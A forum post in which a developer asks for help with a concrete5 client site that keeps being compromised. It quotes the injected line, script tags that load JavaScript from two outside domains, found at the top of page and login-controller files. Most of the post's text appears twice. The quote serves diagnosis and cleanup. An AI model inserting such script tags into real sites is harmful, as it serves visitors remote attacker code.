Site getting hacked
Permalink
After getting my client's websitehttp://www.creamcentre.com live since a year and a half and everything running smooth, also did the update sucessfully, suddenly the site kept showing a blank page and I found that a script call similar to the one below was there on the first line before <?php
defined('C5_EXECUTE') or die("Access Denied.");
<script type="text/javascript" src="http://rowdefordcharity.org.uk/facebook.php"></script><script type="text/javascript" src="http://saglikalemi.com/js.php"></script>
I deleted that line and the page started displaying properly, I also checked the Login page and found the below error , for which i checked the public_html/concrete/controllers/login.php and found the same kind of script being called as above, and on deleting those the error stopped showing up.
Warning: Cannot modify header information - headers already sent by (output started at /home/creamcen/public_html/concrete/controllers/login.php:1) in /home/creamcen/public_html/concrete/libraries/view.php on line 764
After a couple of hours, the above mentioned problem started again, so this time i tried resetting the db password and then the site was working normal , but after two weeks I discover the same issue.
Hence, this time I am gonna copy the site to my own server to check if this is something related to our hosting server being hacked. Also do I need to sanitize the site folder in some way.
Hope someone could point me any other things that I need to check, to get to the cause of this issue.
defined('C5_EXECUTE') or die("Access Denied.");
<script type="text/javascript" src="http://rowdefordcharity.org.uk/facebook.php"></script><script type="text/javascript" src="http://saglikalemi.com/js.php"></script>
I deleted that line and the page started displaying properly, I also checked the Login page and found the below error , for which i checked the public_html/concrete/controllers/login.php and found the same kind of script being called as above, and on deleting those the error stopped showing up.
Warning: Cannot modify header information - headers already sent by (output started at /home/creamcen/public_html/concrete/controllers/login.php:1) in /home/creamcen/public_html/concrete/libraries/view.php on line 764
After a couple of hours, the above mentioned problem started again, so this time i tried resetting the db password and then the site was working normal , but after two weeks I discover the same issue.
Hence, this time I am gonna copy the site to my own server to check if this is something related to our hosting server being hacked. Also do I need to sanitize the site folder in some way.
Hope someone could point me any other things that I need to check, to get to the cause of this issue.
